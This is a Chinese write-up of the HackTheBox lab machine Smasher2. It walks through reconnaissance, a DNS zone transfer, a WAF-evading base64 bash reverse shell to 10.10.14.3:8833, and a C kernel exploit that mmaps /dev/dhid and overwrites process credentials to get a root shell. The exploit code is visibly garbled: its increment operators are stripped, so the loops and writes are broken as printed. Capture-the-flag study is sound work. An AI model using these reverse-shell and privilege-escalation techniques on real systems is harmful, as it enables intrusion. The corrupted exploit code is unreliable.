HTB-靶机-Smasher2
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.135
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.135 -o ./Smasher2-autorecon
有dns服务开启,试试区域传送
dig -t axfr smasher2.htb @10.10.10.135
发现好些域名,绑定hosts访问
10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb
爆破下目录
发现目录backup有敏感文件
先把上面两个文件下载下来放着,访问绑定的hosts域名发现一个登陆窗口
这里卡了很久,本靶机难度还是很高的,后来通过网上的writeup分析上面下载下来的文件,得出如下,具体分析可参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html
得到api接口的请求key值,可以通过此key执行命令,在测试的过程中发现有WAF对常规的命令进行拦截,直接使用绕过WAF的执行命令代码反弹shell
WAF绕过技术https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg==原始命令echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash绕过WAF命令{"schedule":"ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}
为了稳定方便的连接目标靶机,本地生成公钥和私钥,然后通过私钥连接到目标靶机
准备root提权,这里提权需要自己写exploit,具体分析和编写exploit参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root
#include <stdio.h>#include <fcntl.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/types.h>#include <sys/mman.h>int main ( int argc, char * const * argv){ printf ( "[ ] PID: %d\n" , getpid()); int fd = open( "/dev/dhid" , O_RDWR); if (fd < 0 ) { printf ( "[-] Open failed!\n" ); return -1 ; } printf ( "[ ] Open OK fd: %d\n" , fd); unsigned long size = 0xf0000000 ; unsigned long mmapStart = 0x42424000 ; unsigned int * addr = ( unsigned int *)mmap(( void *)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0 ); if (addr == MAP_FAILED) { perror( "Failed to mmap: " ); close(fd); return -1 ; } printf ( "[ ] mmap OK addr: %lx\n" , addr); unsigned int uid = getuid(); printf ( "[ ] UID: %d\n" , uid); unsigned int credIt = 0 ; unsigned int credNum = 0 ; while ((( unsigned long )addr) < (mmapStart size - 0x40 )) {credIt = 0 ; if ( addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid && addr[credIt ] == uid ) { credNum ; printf ( "[ ] Found cred structure! ptr: %p, credNum: %d\n" , addr, credNum); credIt = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; addr[credIt ] = 0 ; if (getuid() == 0 ) { puts ( "[ ] GOT ROOT!" ); credIt = 1 ; //Skip 4 bytes, to get capabilities addr addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff ; addr[credIt ] = 0xffffffff; execl( "/bin/sh" , "-" , ( char *) NULL ); puts ( "[-] Execl failed..." ); break ; } else { credIt = 0 ; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; addr[credIt ] = uid; } } addr ; } puts ( "[ ] Scanning loop END" ); fflush( stdout ); int stop = getchar(); return 0 ;}
通过本地kali编译完成之后再使用scp传到目标靶机执行exploit提权
赞 (0)